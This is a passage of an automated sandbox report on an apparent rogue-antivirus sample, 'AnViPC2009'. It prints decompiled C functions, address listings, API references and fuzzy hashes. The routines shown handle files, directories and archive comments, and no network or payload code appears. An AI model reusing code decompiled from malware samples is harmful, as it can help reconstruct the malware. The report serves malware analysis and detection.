                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                      • String ID: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe
                                                                                                                                                      • API String ID: 3664257935-3754918145
                                                                                                                                                      • Opcode ID: aa0f0d0a31222e1c633dfd25cdcebbfd44fcc52f42a65a2f3c19f7151812dd85
                                                                                                                                                      • Instruction ID: 083892d07a101c2cf0ff630c68f4d3d0e534bf94cff5b240c246acdf1fa32695
                                                                                                                                                      • Opcode Fuzzy Hash: aa0f0d0a31222e1c633dfd25cdcebbfd44fcc52f42a65a2f3c19f7151812dd85
                                                                                                                                                      • Instruction Fuzzy Hash: DEE012366012209BC620AB59ED449CBF3ECBF86721316446BE944E3360C7A4EC428AA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                      			E0040505E(void* __ecx, CHAR* _a4, WCHAR* _a8, char _a12, char _a15, long _a16) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				void* _t41;
                                                                                                                                                      				void* _t44;
                                                                                                                                                      				WCHAR* _t51;
                                                                                                                                                      				long _t58;
                                                                                                                                                      				void* _t59;
                                                                                                                                                      				void* _t62;
                                                                                                                                                      
                                                                                                                                                      				_t55 = __ecx;
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t62 = __ecx;
                                                                                                                                                      				 *((intOrPtr*)(__ecx + 0xc18)) = 0;
                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x16)) != 0) {
                                                                                                                                                      					_a12 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				_v8 = 0x80000000;
                                                                                                                                                      				if(_a16 != 0) {
                                                                                                                                                      					_v8 = 0xc0000000;
                                                                                                                                                      				}
                                                                                                                                                      				_a16 = 1;
                                                                                                                                                      				if(_a12 != 0) {
                                                                                                                                                      					_a16 = 3;
                                                                                                                                                      				}
                                                                                                                                                      				_t58 = (0 |  *((intOrPtr*)(_t62 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
                                                                                                                                                      				if(E00406E67() == 0) {
                                                                                                                                                      					L10:
                                                                                                                                                      					_t41 = CreateFileA(_a4, _v8, _a16, 0, 3, _t58, 0); // executed
                                                                                                                                                      				} else {
                                                                                                                                                      					_t51 = _a8;
                                                                                                                                                      					if(_t51 == 0 ||  *_t51 == 0) {
                                                                                                                                                      						goto L10;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t41 = CreateFileW(_t51, _v8, _a16, 0, 3, _t58, 0); // executed
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t59 = _t41;
                                                                                                                                                      				if(_t59 == 0xffffffff && GetLastError() == 2) {
                                                                                                                                                      					 *((intOrPtr*)(_t62 + 0xc18)) = 1;
                                                                                                                                                      				}
                                                                                                                                                      				_a15 = _t59 != 0xffffffff;
                                                                                                                                                      				 *((char*)(_t62 + 0x12)) = 0;
                                                                                                                                                      				 *((intOrPtr*)(_t62 + 0xc)) = 0;
                                                                                                                                                      				 *((char*)(_t62 + 0x10)) = 0;
                                                                                                                                                      				if(_a15 != 0) {
                                                                                                                                                      					 *(_t62 + 4) = _t59;
                                                                                                                                                      					if(_a8 == 0) {
                                                                                                                                                      						 *((short*)(_t62 + 0x418)) = 0;
                                                                                                                                                      					} else {
                                                                                                                                                      						E0040E40C(_t62 + 0x418, _a8);
                                                                                                                                                      					}
                                                                                                                                                      					_t44 = _t62 + 0x17;
                                                                                                                                                      					if(_a4 == 0) {
                                                                                                                                                      						E0040E1E9(_t55, _a8, _t44, 0x1000000);
                                                                                                                                                      					} else {
                                                                                                                                                      						E0040A450(_t44, _a4);
                                                                                                                                                      					}
                                                                                                                                                      					E00404ECE(_t62,  *(_t62 + 4));
                                                                                                                                                      				}
                                                                                                                                                      				return _a15;
                                                                                                                                                      			}










                                                                                                                                                      0x0040505e
                                                                                                                                                      0x00405061
                                                                                                                                                      0x00405064
                                                                                                                                                      0x00405069
                                                                                                                                                      0x00405072
                                                                                                                                                      0x00405074
                                                                                                                                                      0x00405074
                                                                                                                                                      0x00405078
                                                                                                                                                      0x00405082
                                                                                                                                                      0x00405084
                                                                                                                                                      0x00405084
                                                                                                                                                      0x0040508b
                                                                                                                                                      0x00405095
                                                                                                                                                      0x00405097
                                                                                                                                                      0x00405097
                                                                                                                                                      0x004050ac
                                                                                                                                                      0x004050b5
                                                                                                                                                      0x004050d7
                                                                                                                                                      0x004050e5
                                                                                                                                                      0x004050b7
                                                                                                                                                      0x004050b7
                                                                                                                                                      0x004050bc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004050c3
                                                                                                                                                      0x004050cf
                                                                                                                                                      0x004050cf
                                                                                                                                                      0x004050bc
                                                                                                                                                      0x004050eb
                                                                                                                                                      0x004050f0
                                                                                                                                                      0x004050fd
                                                                                                                                                      0x004050fd
                                                                                                                                                      0x0040510a
                                                                                                                                                      0x0040510e
                                                                                                                                                      0x00405111
                                                                                                                                                      0x00405114
                                                                                                                                                      0x0040511a
                                                                                                                                                      0x0040511c
                                                                                                                                                      0x00405122
                                                                                                                                                      0x00405137
                                                                                                                                                      0x00405124
                                                                                                                                                      0x0040512e
                                                                                                                                                      0x0040512e
                                                                                                                                                      0x0040513e
                                                                                                                                                      0x00405144
                                                                                                                                                      0x0040515a
                                                                                                                                                      0x00405146
                                                                                                                                                      0x0040514a
                                                                                                                                                      0x0040514a
                                                                                                                                                      0x00405164
                                                                                                                                                      0x00405164
                                                                                                                                                      0x00405170

                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,-00000001,00000000,00000000,?,00000000,?,?,004092E2,?,00000000,00000001), ref: 004050CF
                                                                                                                                                      • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,-00000001,00000000,00000000,?,00000000,?,?,004092E2,?,00000000,00000001), ref: 004050E5
                                                                                                                                                        • Part of subcall function 0040E1E9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,?,0040515F,?,?,01000000,?), ref: 0040E203
                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,004092E2,?,00000000,00000001,00000000,00000000,?,?,?,0000005C,00414C88), ref: 004050F2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile$ByteCharErrorLastMultiWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 158210224-0
                                                                                                                                                      • Opcode ID: 5a2fbc54e5daaccae5f8b923658c938948fd63ac06f06a9dd3b8363673405bad
                                                                                                                                                      • Instruction ID: bc4a3d4203c432f7c64f81e59d9b0129e7794b1fee3f8e9237a2fe64023df2e9
                                                                                                                                                      • Opcode Fuzzy Hash: 5a2fbc54e5daaccae5f8b923658c938948fd63ac06f06a9dd3b8363673405bad
                                                                                                                                                      • Instruction Fuzzy Hash: 7F31E071400B88AFDB218F60C844BDF7BA9EB01314F14893EF951AB281C7B99E549BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E00405299(void* __ecx, void* _a4, long _a8) {
                                                                                                                                                      				long _v8;
                                                                                                                                                      				int _t14;
                                                                                                                                                      				signed int _t15;
                                                                                                                                                      				long _t16;
                                                                                                                                                      				void* _t22;
                                                                                                                                                      
                                                                                                                                                      				_push(__ecx);
                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
                                                                                                                                                      					if(_a8 > 0x4e20) {
                                                                                                                                                      						_a8 = 0x4e20;
                                                                                                                                                      					}
                                                                                                                                                      					 *(_t22 + 4) = GetStdHandle(0xfffffff6);
                                                                                                                                                      				}
                                                                                                                                                      				_t14 = ReadFile( *(_t22 + 4), _a4, _a8,  &_v8, 0); // executed
                                                                                                                                                      				if(_t14 != 0) {
                                                                                                                                                      					_t15 = _v8;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t16 = E00405018(_t22);
                                                                                                                                                      					if(_t16 == 0 || _a8 <= 0x4e20) {
                                                                                                                                                      						if( *((intOrPtr*)(_t22 + 0xc)) != 1) {
                                                                                                                                                      							L11:
                                                                                                                                                      							_t15 = _t16 | 0xffffffff;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t16 = GetLastError();
                                                                                                                                                      							if(_t16 != 0x6d) {
                                                                                                                                                      								goto L11;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t15 = 0;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t15 = E00405299(_t22, _a4, 0x4e20);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t15;
                                                                                                                                                      			}








                                                                                                                                                      0x0040529c
                                                                                                                                                      0x0040529f
                                                                                                                                                      0x004052aa
                                                                                                                                                      0x004052af
                                                                                                                                                      0x004052b1
                                                                                                                                                      0x004052b1
                                                                                                                                                      0x004052bc
                                                                                                                                                      0x004052bc
                                                                                                                                                      0x004052ce
                                                                                                                                                      0x004052d6
                                                                                                                                                      0x0040530f
                                                                                                                                                      0x004052d8
                                                                                                                                                      0x004052da
                                                                                                                                                      0x004052e1
                                                                                                                                                      0x004052f9
                                                                                                                                                      0x0040530a
                                                                                                                                                      0x0040530a
                                                                                                                                                      0x004052fb
                                                                                                                                                      0x004052fb
                                                                                                                                                      0x00405304
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00405306
                                                                                                                                                      0x00405306
                                                                                                                                                      0x00405306
                                                                                                                                                      0x00405304
                                                                                                                                                      0x004052e8
                                                                                                                                                      0x004052ee
                                                                                                                                                      0x004052ee
                                                                                                                                                      0x004052e1
                                                                                                                                                      0x00405315

                                                                                                                                                      APIs
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,?,00414C7C,?,?,00405686,000000FF,?,00000000,?,00000000), ref: 004052B6
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,?,00414C7C,?,?,00405686,000000FF,?,00000000,?,00000000), ref: 004052CE
                                                                                                                                                      • GetLastError.KERNEL32(?,00405686,000000FF,?,00000000,?,00000000), ref: 004052FB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFileHandleLastRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1699850967-0
                                                                                                                                                      • Opcode ID: 423eb982c2c7c125813fa3b0acb62332a65a30c938369a6682ef3f3fa0f25a43
                                                                                                                                                      • Instruction ID: 2102482b96df2fad2395b01c3bf64a53081d4933113787b0af290282fe245b16
                                                                                                                                                      • Opcode Fuzzy Hash: 423eb982c2c7c125813fa3b0acb62332a65a30c938369a6682ef3f3fa0f25a43
                                                                                                                                                      • Instruction Fuzzy Hash: 59016131500A04FBCF20AF12D9044AF7B69EF413B0B00C17BF925A52D0C7788950EF99
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040585A(void* __eflags, CHAR* _a4, WCHAR* _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                      				void* _t6;
                                                                                                                                                      				int _t7;
                                                                                                                                                      				long _t8;
                                                                                                                                                      				void* _t9;
                                                                                                                                                      				WCHAR* _t14;
                                                                                                                                                      
                                                                                                                                                      				_t6 = E00406E67();
                                                                                                                                                      				_t14 = _a8;
                                                                                                                                                      				if(_t6 == 0 || _t14 == 0 ||  *_t14 == 0) {
                                                                                                                                                      					_t7 = CreateDirectoryA(_a4, 0); // executed
                                                                                                                                                      				} else {
                                                                                                                                                      					_t7 = CreateDirectoryW(_t14, 0);
                                                                                                                                                      				}
                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                      					_t8 = GetLastError();
                                                                                                                                                      					__eflags = _t8 - 2;
                                                                                                                                                      					if(_t8 == 2) {
                                                                                                                                                      						L12:
                                                                                                                                                      						_t9 = 2;
                                                                                                                                                      						return _t9;
                                                                                                                                                      					}
                                                                                                                                                      					__eflags = _t8 - 3;
                                                                                                                                                      					if(_t8 == 3) {
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      					return 1;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t20 = _a12;
                                                                                                                                                      					if(_a12 != 0) {
                                                                                                                                                      						E004057AA(_t20, _a4, _t14, _a16);
                                                                                                                                                      					}
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}








                                                                                                                                                      0x0040585e
                                                                                                                                                      0x00405863
                                                                                                                                                      0x00405868
                                                                                                                                                      0x00405884
                                                                                                                                                      0x00405874
                                                                                                                                                      0x00405877
                                                                                                                                                      0x00405877
                                                                                                                                                      0x0040588c
                                                                                                                                                      0x004058a4
                                                                                                                                                      0x004058aa
                                                                                                                                                      0x004058ad
                                                                                                                                                      0x004058b9
                                                                                                                                                      0x004058bb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004058bb
                                                                                                                                                      0x004058af
                                                                                                                                                      0x004058b2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040588e
                                                                                                                                                      0x0040588e
                                                                                                                                                      0x00405892
                                                                                                                                                      0x0040589b
                                                                                                                                                      0x0040589b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004058a0

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                      • CreateDirectoryW.KERNEL32(00000400,00000000,00000000,?,00405976,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 00405877
                                                                                                                                                      • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000,?,00405976,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 00405884
                                                                                                                                                      • GetLastError.KERNEL32(?,00405976,00000400,00000002,00000001,00000000,00000000,00000400,00000000), ref: 004058A4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDirectory$ErrorLastVersion
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4238167203-0
                                                                                                                                                      • Opcode ID: 81501833817551d86af71a76ea8df1cfaf166db4fb332051c75c92c51d561e9b
                                                                                                                                                      • Instruction ID: f49a4586712382b23957ae74ee0495d634437e3f0d7f7fffeaa51e4b3b56a346
                                                                                                                                                      • Opcode Fuzzy Hash: 81501833817551d86af71a76ea8df1cfaf166db4fb332051c75c92c51d561e9b
                                                                                                                                                      • Instruction Fuzzy Hash: AFF0A4321019056AEB257A229C09BAB3A18DF00740F14C537FE02F51E0D77CC871DA9D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                                      			E0040AA9B(void* __ecx, intOrPtr _a4, int _a8) {
                                                                                                                                                      				struct _ITEMIDLIST* _v8;
                                                                                                                                                      				void* _v12;
                                                                                                                                                      				intOrPtr* _t12;
                                                                                                                                                      
                                                                                                                                                      				__imp__SHGetMalloc( &_v12, __ecx, __ecx);
                                                                                                                                                      				SHGetSpecialFolderLocation(0, _a8,  &_v8); // executed
                                                                                                                                                      				__imp__SHGetPathFromIDListA(_v8, _a4); // executed
                                                                                                                                                      				_t12 = _v12;
                                                                                                                                                      				return  *((intOrPtr*)( *_t12 + 0x14))(_t12, _v8);
                                                                                                                                                      			}






                                                                                                                                                      0x0040aaa4
                                                                                                                                                      0x0040aab3
                                                                                                                                                      0x0040aabf
                                                                                                                                                      0x0040aac5
                                                                                                                                                      0x0040aad2

                                                                                                                                                      APIs
                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 0040AAA4
                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,?,?), ref: 0040AAB3
                                                                                                                                                      • SHGetPathFromIDListA.SHELL32(?,?), ref: 0040AABF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FolderFromListLocationMallocPathSpecial
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 628029987-0
                                                                                                                                                      • Opcode ID: df2556eee234547602640ddb04af988f2cdaa077e0eefedec4b74921080d4395
                                                                                                                                                      • Instruction ID: f71e1e9fe61c152cb1e5697b4ac27f55d3cba9fbd9229f8b989aedb73968518a
                                                                                                                                                      • Opcode Fuzzy Hash: df2556eee234547602640ddb04af988f2cdaa077e0eefedec4b74921080d4395
                                                                                                                                                      • Instruction Fuzzy Hash: DAE0CA7A900109FFDF05DFE0DE09DDEBB79EB08205F1080A0FA06D6120D6B1AA24AB24
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 69%
                                                                                                                                                      			E00401887(void* __ecx, void* __edx, void* __edi, CHAR** _a4, long _a8) {
                                                                                                                                                      				char _v28;
                                                                                                                                                      				long _t27;
                                                                                                                                                      				signed int _t29;
                                                                                                                                                      				long _t30;
                                                                                                                                                      				signed int _t35;
                                                                                                                                                      				signed int _t48;
                                                                                                                                                      				long _t50;
                                                                                                                                                      				long _t67;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				CHAR** _t70;
                                                                                                                                                      
                                                                                                                                                      				_t69 = __ecx;
                                                                                                                                                      				if( *((char*)(__ecx + 0x6d8b)) != 0) {
                                                                                                                                                      					E0040A7C2( &_v28, __edx, __ecx);
                                                                                                                                                      					__eflags =  *(_t69 + 0x4694) & 0x00000002;
                                                                                                                                                      					_push(0);
                                                                                                                                                      					_push(0);
                                                                                                                                                      					if(( *(_t69 + 0x4694) & 0x00000002) == 0) {
                                                                                                                                                      						_push(( *(_t69 + 0x4696) & 0x0000ffff) +  *((intOrPtr*)(_t69 + 0x6d94)) + 7);
                                                                                                                                                      						E004054B4(_t69);
                                                                                                                                                      						_t27 = E0040274C(_t69, __edx, __eflags, "CMT");
                                                                                                                                                      						__eflags = _t27;
                                                                                                                                                      						if(_t27 == 0) {
                                                                                                                                                      							L11:
                                                                                                                                                      							_t48 = 0;
                                                                                                                                                      							__eflags = 0;
                                                                                                                                                      							L12:
                                                                                                                                                      							E0040A7E9( &_v28);
                                                                                                                                                      							_t29 = _t48;
                                                                                                                                                      							L13:
                                                                                                                                                      							return _t29;
                                                                                                                                                      						}
                                                                                                                                                      						_t30 = E004016DE(_t69, _a4, _a8); // executed
                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                      							goto L11;
                                                                                                                                                      						}
                                                                                                                                                      						_t48 = 1;
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      					_push( *((intOrPtr*)(_t69 + 0x6d94)) + 0x14);
                                                                                                                                                      					E004054B4(_t69);
                                                                                                                                                      					E00401CA1(_t69, __edx, __eflags);
                                                                                                                                                      					_t70 = _a4;
                                                                                                                                                      					_t50 = _t70[1];
                                                                                                                                                      					__eflags = _t50;
                                                                                                                                                      					if(_t50 > 0) {
                                                                                                                                                      						OemToCharBuffA( *_t70,  *_t70, _t50);
                                                                                                                                                      						_t67 = _a8;
                                                                                                                                                      						__eflags = _t67;
                                                                                                                                                      						if(_t67 != 0) {
                                                                                                                                                      							E0040167B(_t67, _t50 + 1);
                                                                                                                                                      							E00401660(_t70, 0);
                                                                                                                                                      							E0040E218( *_t70,  *_t67, _t50 + 1);
                                                                                                                                                      							E004016C4(_t70, _t50);
                                                                                                                                                      							E0040167B(_t67, E0040E3F5( *_t67));
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t35 = E0040A7E9( &_v28);
                                                                                                                                                      					__eflags = _t70[1];
                                                                                                                                                      					_t29 = _t35 & 0xffffff00 | _t70[1] > 0x00000000;
                                                                                                                                                      					goto L13;
                                                                                                                                                      				}
                                                                                                                                                      				return 0;
                                                                                                                                                      			}













                                                                                                                                                      0x0040188e
                                                                                                                                                      0x00401897
                                                                                                                                                      0x004018a5
                                                                                                                                                      0x004018aa
                                                                                                                                                      0x004018b1
                                                                                                                                                      0x004018b3
                                                                                                                                                      0x004018b5
                                                                                                                                                      0x0040194c
                                                                                                                                                      0x0040194f
                                                                                                                                                      0x0040195b
                                                                                                                                                      0x00401960
                                                                                                                                                      0x00401962
                                                                                                                                                      0x00401979
                                                                                                                                                      0x00401979
                                                                                                                                                      0x00401979
                                                                                                                                                      0x0040197b
                                                                                                                                                      0x0040197e
                                                                                                                                                      0x00401983
                                                                                                                                                      0x00401985
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401985
                                                                                                                                                      0x0040196c
                                                                                                                                                      0x00401971
                                                                                                                                                      0x00401973
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401975
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401975
                                                                                                                                                      0x004018c4
                                                                                                                                                      0x004018c7
                                                                                                                                                      0x004018ce
                                                                                                                                                      0x004018d3
                                                                                                                                                      0x004018d6
                                                                                                                                                      0x004018d9
                                                                                                                                                      0x004018db
                                                                                                                                                      0x004018e3
                                                                                                                                                      0x004018e9
                                                                                                                                                      0x004018ec
                                                                                                                                                      0x004018ee
                                                                                                                                                      0x004018f6
                                                                                                                                                      0x004018ff
                                                                                                                                                      0x0040190c
                                                                                                                                                      0x00401914
                                                                                                                                                      0x00401923
                                                                                                                                                      0x00401923
                                                                                                                                                      0x00401928
                                                                                                                                                      0x0040192f
                                                                                                                                                      0x00401934
                                                                                                                                                      0x00401936
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401936
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BuffChar
                                                                                                                                                      • String ID: CMT
                                                                                                                                                      • API String ID: 1973267554-2756464174
                                                                                                                                                      • Opcode ID: 683bb94dbd11273eb1dd50c52b5243f55e481dcf058bb089e32f5a211393342f
                                                                                                                                                      • Instruction ID: 351763eee22837c5a62972fcfadf7bcbf7ec653a156bc51b235eb532ec158812
                                                                                                                                                      • Opcode Fuzzy Hash: 683bb94dbd11273eb1dd50c52b5243f55e481dcf058bb089e32f5a211393342f
                                                                                                                                                      • Instruction Fuzzy Hash: C92184716006146BDB15AA22C852AAEB7AD9F44708F04442FB8467B2E2DA399D12C7A9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                      			E00404EF5(void* __ecx) {
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				int _t22;
                                                                                                                                                      				signed int _t23;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      
                                                                                                                                                      				_t30 = __ecx;
                                                                                                                                                      				_t24 = 1;
                                                                                                                                                      				if( *(__ecx + 0xc) == 0) {
                                                                                                                                                      					_t18 =  *(__ecx + 4);
                                                                                                                                                      					if(_t18 == 0xffffffff) {
                                                                                                                                                      						L14:
                                                                                                                                                      						 *((intOrPtr*)(_t30 + 0xc1c)) =  *((intOrPtr*)(_t30 + 0xc1c)) + 1;
                                                                                                                                                      						return _t24;
                                                                                                                                                      					}
                                                                                                                                                      					if( *((char*)(__ecx + 0x10)) != 0) {
                                                                                                                                                      						L11:
                                                                                                                                                      						 *(_t30 + 4) =  *(_t30 + 4) | 0xffffffff;
                                                                                                                                                      						if(_t24 == 0 &&  *((intOrPtr*)(_t30 + 0x14)) != _t24) {
                                                                                                                                                      							_t15 = _t30 + 0x17; // 0x17
                                                                                                                                                      							E00403296(0x414c7c, _t15);
                                                                                                                                                      						}
                                                                                                                                                      						goto L14;
                                                                                                                                                      					}
                                                                                                                                                      					_t22 = FindCloseChangeNotification(_t18); // executed
                                                                                                                                                      					asm("sbb bl, bl");
                                                                                                                                                      					_t24 =  ~(_t22 - 1) + 1;
                                                                                                                                                      					if(1 != 0 ||  *0x414c70 == 0) {
                                                                                                                                                      						_t23 = 0;
                                                                                                                                                      						while( *(0x414870 + _t23 * 4) != _t30) {
                                                                                                                                                      							_t23 = _t23 + 1;
                                                                                                                                                      							if(_t23 < 0x100) {
                                                                                                                                                      								continue;
                                                                                                                                                      							}
                                                                                                                                                      							goto L11;
                                                                                                                                                      						}
                                                                                                                                                      						 *(0x414870 + _t23 * 4) =  *(0x414870 + _t23 * 4) & 0x00000000;
                                                                                                                                                      					}
                                                                                                                                                      					goto L11;
                                                                                                                                                      				}
                                                                                                                                                      				 *(__ecx + 0xc) =  *(__ecx + 0xc) & 0x00000000;
                                                                                                                                                      				goto L14;
